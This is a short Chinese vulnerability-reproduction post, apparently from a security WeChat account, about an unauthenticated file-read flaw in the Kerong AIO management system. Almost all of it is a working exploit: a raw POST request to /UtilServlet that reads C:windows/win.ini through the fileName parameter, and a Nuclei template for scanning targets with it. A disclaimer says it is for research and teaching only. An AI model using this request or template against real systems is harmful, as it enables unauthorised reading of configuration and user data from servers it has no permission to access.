漏洞概述
漏洞复现
POST/UtilServletHTTP/1.1Host:Upgrade-Insecure-Requests: 1sec-ch-ua-mobile: ?0Cache-Control: no-cachePragma: no-cacheAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedsec-ch-ua: "Google Chrome";v="118", "Chromium";v="118", "Not=A?Brand";v="24"sec-ch-ua-platform: "Windows"Accept-Language: zh-CN,zh;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-Length: 0operation=readErrorExcel&fileName=C:windows/win.ini
NUCLEI POC
id: kerong-AIO-UtilServlet-filereadinfo:name:科荣AIO管理系统文件读取漏洞author:rainseverity:highdescription:科荣AIO管理系统存在文件读取漏洞,攻击者通过未经授权的访问,构造恶意请求并读取系统中的敏感文件。该漏洞可能导致泄露配置信息、用户数据等敏感信息,为确保系统安全,建议尽快修复漏洞,实施有效的输入验证和访问控制机制。metadata::body="changeAccount('8000')"http:raw:|POST/UtilServlet HTTP/1.1Host:{{Hostname}}:1:?0:no-cachePragma:no-cacheAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7:gzip, deflate:application/x-www-form-urlencoded:"Google Chrome";v="118", "Chromium";v="118", "Not=A?Brand";v="24":"Windows":zh-CN,zh;q=0.9:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36:0operation=readErrorExcel&fileName=C:windows/win.inimatchers:type: dsldsl:'status_code==200 && contains_all(body,"[fonts]")'
原文始发于微信公众号(知黑守白):「漏洞复现」科荣 AIO 管理系统 文件读取
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论